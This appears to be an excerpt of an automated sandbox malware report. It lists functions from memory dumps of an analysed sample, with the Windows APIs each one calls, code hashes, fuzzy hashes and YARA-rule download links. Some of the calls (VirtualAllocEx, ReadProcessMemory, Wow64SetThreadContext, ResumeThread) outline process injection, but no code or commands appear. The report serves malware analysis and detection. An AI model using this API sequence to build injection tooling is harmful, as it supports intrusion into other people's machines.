Instruction ID: c1b538d7cb69a016b9955f0323712eb80f5394fda220a4bf3bac98d043d2bd50
Opcode Fuzzy Hash: a0d3fe44ce90802a30fe7e842230c9de0b0f585892987275816d5023d2daed05
Instruction Fuzzy Hash: 5A21E3B5D00259DFDB10CFAAD985ADEBFF4EB48320F14805AE918A7350D378A945CFA1

Function 0692C7B1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0692C836

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f5c0d4118dbb1ee206bb016a27e07ea5fb8e0a3264427b7ec0d9ab6ea6b51ee6
Instruction ID: 1b351b8863f4a4158102dbfaaaa43a5342daa8230dd85225e275423ea0ef1841
Opcode Fuzzy Hash: f5c0d4118dbb1ee206bb016a27e07ea5fb8e0a3264427b7ec0d9ab6ea6b51ee6
Instruction Fuzzy Hash: 022157B1D002098FCB50DFAAC8857EEBBF4EF48310F10C42AD519A7240D778A949CBA0

Function 0692CA38 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0692CAC0

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e6e30d36f536b85e94e0bc057ff6eae266e9c9bb95ff85e1d1b397b7f8bd6295
Instruction ID: ae3bbd0df1828383f9c737edf2b98cac42434f5e8ba57126d97ee7c73e408365
Opcode Fuzzy Hash: e6e30d36f536b85e94e0bc057ff6eae266e9c9bb95ff85e1d1b397b7f8bd6295
Instruction Fuzzy Hash: 032139B1D003599FCB10DFA9C8416DEFBF4FF48310F10842AE519A3240D7389544CBA0

Function 077A31B8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 077A323C

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 2ea719e20686e9d1ba12ecbe59b6965e125789cd76afe9443594ab183e3647ef
Instruction ID: dbafd6e6303fefd91cffeaf4a02d175256770a39e9df785661966fd0b5f7d8a2
Opcode Fuzzy Hash: 2ea719e20686e9d1ba12ecbe59b6965e125789cd76afe9443594ab183e3647ef
Instruction Fuzzy Hash: DE2137B19003099FDB10CF9AD884ADEFBF5FB88350F14842AE918A3340D338A944CB64

Function 0B3411F1 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B34127D

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9a9fb73d44f8b71b2056ab35dfc151766a5ced90af32a9ea0bd5c5c5d2faef9e
Instruction ID: 094bf76f215ba65eb25c1c88277f16bd94b2d0c26c412d484de29ba88ce52769
Opcode Fuzzy Hash: 9a9fb73d44f8b71b2056ab35dfc151766a5ced90af32a9ea0bd5c5c5d2faef9e
Instruction Fuzzy Hash: D2219D758043889FDB00CF99C849BDEBFF4EB09310F14805AD858A7251C378A544DFA1

Function 0692C7B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0692C836

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d101492f0f485979fe4b8e174c08f8606429282b5214c3e0011ba58bf3b070f6
Instruction ID: b1343723890ccbec8b261f9cc01ab94dfefc0f25009bb135144e6994143f42dd
Opcode Fuzzy Hash: d101492f0f485979fe4b8e174c08f8606429282b5214c3e0011ba58bf3b070f6
Instruction Fuzzy Hash: DF213471D002198FDB50DFAAC8857EEBBF4EF48320F10842AD419A7240DB78A945CBA0

Function 0692CA40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0692CAC0

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 934f47c0ba91b602127103329f38438980f88a1ef4d0c61bf34aa00bca06b099
Instruction ID: ecf1ae8006a6b38951a9bec1bbf8067039479c981ba9983668a648bc1930cb27
Opcode Fuzzy Hash: 934f47c0ba91b602127103329f38438980f88a1ef4d0c61bf34aa00bca06b099
Instruction Fuzzy Hash: E42139B1D003599FCB10DFAAC881AEEFBF5FF48320F10842AE519A7240D7799944CBA0

Function 077A31C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 077A323C

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 4dba695cc2d7596b567aea3b781f116dc3325cd92905d59a8de79c59ff7a8136
Instruction ID: e33e8b9db183b1b4bc80114b5b29d1ee960888ae1a40750ecdd3c746e8863c7c
Opcode Fuzzy Hash: 4dba695cc2d7596b567aea3b781f116dc3325cd92905d59a8de79c59ff7a8136
Instruction Fuzzy Hash: AC2115B1D017599FDB10CF9AD884ADEFBF4FB88310F14852AE818A3240D378A944CBA4

Function 0B3F3A69 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3F3A95

Memory Dump Source

Source File: 00000004.00000002.1363009853.000000000B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b3f0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b11dd3c196ad9457340ccc840cbf0056e654eacb03f5708c704798a69d2832c7
Instruction ID: 37ce2aa48c997c0535acf7b04d7af054eba61a09448eac46c43a2772a2cf11b5
Opcode Fuzzy Hash: b11dd3c196ad9457340ccc840cbf0056e654eacb03f5708c704798a69d2832c7
Instruction Fuzzy Hash: 6E1133343145518FCB15AB3EC46496A77EAEFC560032540AAD602CB372DE71DC02CB54

Function 077AC203 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 077AC279

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: de06323cbe5225e370ce2e65dedf05d025b9718ab6dfc3278c285b4f85f66377
Instruction ID: 681b67c1821f88dd05ad5c91e531cbb24a9393d4aa29e65db072520766663d1e
Opcode Fuzzy Hash: de06323cbe5225e370ce2e65dedf05d025b9718ab6dfc3278c285b4f85f66377
Instruction Fuzzy Hash: EE2129B5D002199FDB14DF9AC844BEEFBF5EB88310F14842AD418A3290D7789945CFA5

Function 077AC208 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 077AC279

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 7eb3b322ebc49d713aaf1110984851a5a60ac746269f9e5d9f0d50b356265fdc
Instruction ID: dc675da68dfaa8cd6b0f57a44810498577dd9ffbc3298f168a48911ec14e04f2
Opcode Fuzzy Hash: 7eb3b322ebc49d713aaf1110984851a5a60ac746269f9e5d9f0d50b356265fdc
Instruction Fuzzy Hash: 4C2108B1D002199FDB14DFAAC844BEEFBF5FB88310F14842AD418A3290D778A945CFA5

Function 024BB159 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024BB126

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 888dcadd65bc4fdddd3ef930996d131a22a6322438bbd16f30673c8a2558c5a6
Instruction ID: c7c7d0e141d08003e6983e53c1fc805d7e7f22dd8fb29f6461e8130f8c575b03
Opcode Fuzzy Hash: 888dcadd65bc4fdddd3ef930996d131a22a6322438bbd16f30673c8a2558c5a6
Instruction Fuzzy Hash: 2011C171A002049FEB12DF6AD8047EABBF6EFC5358F14846BD558A7251C7749806CFB0

Function 0B3F3A78 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3F3A95

Memory Dump Source

Source File: 00000004.00000002.1363009853.000000000B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b3f0000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 769981cd5be15b06a2c1f9fd00198950bc8628490ecf82136e93b95041c65d74
Instruction ID: 824cd44e3215035cb6dcc4f8068074c8da1966026c2643110cc4d44c026c48df
Opcode Fuzzy Hash: 769981cd5be15b06a2c1f9fd00198950bc8628490ecf82136e93b95041c65d74
Instruction Fuzzy Hash: 68111E343105118FCB19AA3EC55486E77EEAFC9A5032540AAEA02CB3B1EE71DC02CB54

Function 0684041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0684311A,?,?,?,?,?), ref: 068431BF

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 52891935939815d6e2336458228a48c7264691540bb95fea43aadb6f49efc8bb
Instruction ID: 23a20ec9cc9f82b61973b79240d08e3fac5b7349b8a233d6e8b27ffbc9fe2a13
Opcode Fuzzy Hash: 52891935939815d6e2336458228a48c7264691540bb95fea43aadb6f49efc8bb
Instruction Fuzzy Hash: 1A113AB190024D9FDB10DF9AC844BDEBFF8EB48310F14845AEA15A7250D375A954DFA4

Function 077A30D8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 077A314A

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 2c8c1ba64c61d26934f46eea842b9f293009d9cbcce0f81f25c2e97f6c277bc2
Instruction ID: 59780d1692d9bf1c39d1c96a9dcedbac94935cd3c0e899d67067a9e3dc0813e1
Opcode Fuzzy Hash: 2c8c1ba64c61d26934f46eea842b9f293009d9cbcce0f81f25c2e97f6c277bc2
Instruction Fuzzy Hash: 471114B6D006499FDB14CF9AC844BDEFBF4EB88310F15842AE859B3640D339A545CFA5

Function 0692C888 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0692C8FE

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ab33c6340cd01374ab7b5edcf4b2b292e0ef9836f2f6a429789fecb22e28e49b
Instruction ID: 90c69a2f68557a887595760cab4c59e7c27ac238e7db2e7e5f3d6863f110df13
Opcode Fuzzy Hash: ab33c6340cd01374ab7b5edcf4b2b292e0ef9836f2f6a429789fecb22e28e49b
Instruction Fuzzy Hash: 9A115672D002499FCB20DFAAC845BEEBBF5EF48324F10841AE559A7250C775A944CBA0

Function 0B344DB8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B346022,00000000,00000000,036E412C,0272B630), ref: 0B346470

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 86b3e442cdb8d74d1f6803674164a3def268bc4e19938d1791e46015f2f686cc
Instruction ID: 2ef232a99829421b116369c8de4fc8d3a2049039926f639168fcb607a9959e01
Opcode Fuzzy Hash: 86b3e442cdb8d74d1f6803674164a3def268bc4e19938d1791e46015f2f686cc
Instruction Fuzzy Hash: 9B1117B5C00249DFDB10DF9AD944BDEBBF8EB48310F108469E958A3750D378A544CFA5

Function 0B3467A0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B3460AF,00000000,036E412C,0272B630,00000000,?), ref: 0B34680D

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 34c7696826c368df8ce36723a6edb4c6f6d45c0f9ea91b0d331ae06ceff1b385
Instruction ID: b4c780ede453351ad93c27e687908884e88eb517f50f9cf6183753ff7cae7b7b
Opcode Fuzzy Hash: 34c7696826c368df8ce36723a6edb4c6f6d45c0f9ea91b0d331ae06ceff1b385
Instruction Fuzzy Hash: 441114B5C002499FDB10DF9AD884BEEBBF4EB49320F10846AE858A3241D378A544CFA1

Function 0B344DD0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B3460AF,00000000,036E412C,0272B630,00000000,?), ref: 0B34680D

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c20d2048ce610127652ad515b460ed2afac07a77097b2316fb3a7ad1859c2d74
Instruction ID: 94a2ea89697bffe79704d5a8eb3263c510c9e35d89aca6360137a92c3b5c4ca0
Opcode Fuzzy Hash: c20d2048ce610127652ad515b460ed2afac07a77097b2316fb3a7ad1859c2d74
Instruction Fuzzy Hash: 1611F6B5C043499FDB10DF9AD845BEEFBF8EB48310F11846AE918A3241D378A544CFA5

Function 0B346400 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B346022,00000000,00000000,036E412C,0272B630), ref: 0B346470

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 8d38aa28cd18b480bfe115c533c0034bbde865cfe30d742153a329de40c50375
Instruction ID: 05ab84ae04ac426f9aac74f5f32b03435754b9418c2e55fca6ad1908035569c3
Opcode Fuzzy Hash: 8d38aa28cd18b480bfe115c533c0034bbde865cfe30d742153a329de40c50375
Instruction Fuzzy Hash: E01126B5D00249DFDB10CF9AD944BEEBBF4FB49320F14846AE958A3250C378A644CFA5

Function 077A30E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 077A314A

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 9d8117f23320db4bf9b21f2e2794ff7d8600d13aaa5ca63b12c4fd5d1d6d1ee1
Instruction ID: c6a2f880ff1b1f13fda5e5cd7d9ef42174bd0e5549069f00a1bc7ef3620c16b2
Opcode Fuzzy Hash: 9d8117f23320db4bf9b21f2e2794ff7d8600d13aaa5ca63b12c4fd5d1d6d1ee1
Instruction Fuzzy Hash: 741126B6D006499FDB10CF9AC844BDEFBF4EB88310F10842AD858B3240D338A545CFA5

Function 0692C890 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0692C8FE

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8fde07e02a82d736ed43913a2f83051ef7a87527006362f6f10db3a3aecb6ae9
Instruction ID: 1647fbad9762b05cd803dac17c4d371051828a16b36419d307e59147cf734c6b
Opcode Fuzzy Hash: 8fde07e02a82d736ed43913a2f83051ef7a87527006362f6f10db3a3aecb6ae9
Instruction Fuzzy Hash: 84113775D002499FCB10DFAAC845AEEBFF5EF48324F108419E519A7250C775A954CFA0

Function 0692C2C8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0692C332

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c6d8c09dcc9ba20c06589cc78fd117dec0880f31042adc6ac994a82b261fcecc
Instruction ID: 5555a790803b674754cf488e88fefd6b38fc07dc104cc9cac35222f4cf2c43e3
Opcode Fuzzy Hash: c6d8c09dcc9ba20c06589cc78fd117dec0880f31042adc6ac994a82b261fcecc
Instruction Fuzzy Hash: 131146B1D002498FCB20DFAAC8457EEFBF5AB88320F20841AD519A7644C779A945CFA1

Function 0692C2D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0692C332

Memory Dump Source

Source File: 00000004.00000002.1361084066.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6920000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 69fd9a0a038459cbaad439901ece749a941dff6facf3d82522f0d4017f890bc7
Instruction ID: 6a400f28210b3e55e51861198e670be3f070da82e9a6e437d84ee1041004bdb0
Opcode Fuzzy Hash: 69fd9a0a038459cbaad439901ece749a941dff6facf3d82522f0d4017f890bc7
Instruction Fuzzy Hash: B31128B1D003598BCB20DFAAC8457DEFBF4AB88324F208419D419A7240C6796945CBA1

Function 0B341220 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B34127D

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 326d304f0937148937d35d988b0caff91039fb989013f3924212fb071860b211
Instruction ID: 61b7b5c94ade6f867905f5715704afc0e201e44830c0875d036c9a286e0bf7cc
Opcode Fuzzy Hash: 326d304f0937148937d35d988b0caff91039fb989013f3924212fb071860b211
Instruction Fuzzy Hash: 4B1125B5800749DFDB10CF9AC845BEEBBF8EB48320F108419E918B3250D378A584CFA1

Function 024BB0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024BB126

Memory Dump Source

Source File: 00000004.00000002.1357285592.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24b0000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f08e3bc62b3be0e739d4f111cdb0eb3f5f1084ededfeaa17d8cd3225ae00d339
Instruction ID: a58fff6e3f00262fdf9e7449995c2d29ba41cc6c8302c05a44d8939fe29bad31
Opcode Fuzzy Hash: f08e3bc62b3be0e739d4f111cdb0eb3f5f1084ededfeaa17d8cd3225ae00d339
Instruction Fuzzy Hash: D411FDB5C002498ACB10DF9AD844ADEFBF4EF88314F11841AD818B7200D379A545CFA1

Function 0B344E04 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B346167), ref: 0B346CDD

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b69d468a7e6ba7d3c7761f14bf6463cd6c6f4ffd56eb146d31d0cd2e45e36e46
Instruction ID: f2f0a9b4f927878e4e40ac978d2195b2f8acf1a3732cb0c0e74b606edaae132c
Opcode Fuzzy Hash: b69d468a7e6ba7d3c7761f14bf6463cd6c6f4ffd56eb146d31d0cd2e45e36e46
Instruction Fuzzy Hash: 7B11F2B5D046499FCB10DF9AD544BDEFBF4EB88314F10846AE818B3240D378A944CFA5

Function 077ADAF8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 077ADB55

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2fe14e5ccdc3718cddb8333dec10c94fad877691130d40cec3cfac84c6aaa325
Instruction ID: 2a7551eaf2e75031cd14f955f40c8cd2099c100d68adf8264de34dac3173c7b1
Opcode Fuzzy Hash: 2fe14e5ccdc3718cddb8333dec10c94fad877691130d40cec3cfac84c6aaa325
Instruction Fuzzy Hash: C11115B5900349EFDB10DF9AC888BDEFBF8EB48310F108419E518A3600C375A944CFA5

Function 077ADAF0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 077ADB55

Memory Dump Source

Source File: 00000004.00000002.1361733323.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77a0000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9cb2d634bb4206e49a3293ede8e3f68a98f5c156dc357346c777b96dd27ca850
Instruction ID: bc0b3425f548fa08c6216e05fce21ea95cbf8e0385be05308d9362367491524e
Opcode Fuzzy Hash: 9cb2d634bb4206e49a3293ede8e3f68a98f5c156dc357346c777b96dd27ca850
Instruction Fuzzy Hash: A71133B5900349DFDB10CF99D585BDEBBF4EB48320F10841AD958A3600C374A984CFA5

Function 0B346C79 Relevance: 1.5, APIs: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B346167), ref: 0B346CDD

Memory Dump Source

Source File: 00000004.00000002.1362913994.000000000B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b340000_file.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5297a3a4da1d8603e9b9fb09b726637cb5830c005ffd9162c152a01b47f3ec26
Instruction ID: 04950621b3a202f8cd2ada80692e96889427a34faa6afe92199085dff3927c28
Opcode Fuzzy Hash: 5297a3a4da1d8603e9b9fb09b726637cb5830c005ffd9162c152a01b47f3ec26
Instruction Fuzzy Hash: 9011FEB5C006498ECB14DF9AE5447DEBBF5AB48310F10846AD818A3250D338A944CFA5

Function 068423EF Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 06842422

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8676ec58fe0b33a75abe2091b066779138a21a951766c995f1f1c202472016ad
Instruction ID: 6b5d5ad231a4b7c4dd482930f119ad129bdfba017acd4d717dc26318cfce5f4a
Opcode Fuzzy Hash: 8676ec58fe0b33a75abe2091b066779138a21a951766c995f1f1c202472016ad
Instruction Fuzzy Hash: 5BE06D707546145FD766AB34A81486A3BB9EF89D6435140AAE806CF2A1DE60DC03C794

Function 06840358 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 06842422

Memory Dump Source

Source File: 00000004.00000002.1360993619.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 5f3e58d3570834859876e3e865a3c5ef1948dd2113cf80d2270a837aeb637281
Instruction ID: 7b59510ee3af9a7e5a4fbdff25646b2ab83fd27e982607fc1ac6c19cec118f66
Opcode Fuzzy Hash: 5f3e58d3570834859876e3e865a3c5ef1948dd2113cf80d2270a837aeb637281
Instruction Fuzzy Hash: 71E026317243280B96A4BB398824C3F76ADEFC8E68340482EF906CB354CD20EC02C2D8

Function 04B926B8 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

cTM, xrefs: 04B93812

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: cTM
API String ID: 0-1667893526
Opcode ID: 964b583824ec63c4b1394fc25d50a6c4a6662018ff46745c629633ab7204ff5f
Instruction ID: a085ab21932664258acdb19c521c088a955adabb360e8be8a9d7dfcddec34ba9
Opcode Fuzzy Hash: 964b583824ec63c4b1394fc25d50a6c4a6662018ff46745c629633ab7204ff5f
Instruction Fuzzy Hash: 2F91FEB1D003589FDB14CFA9C884ADEBBF1FF49304F24816AE808AB255E7746949CF91

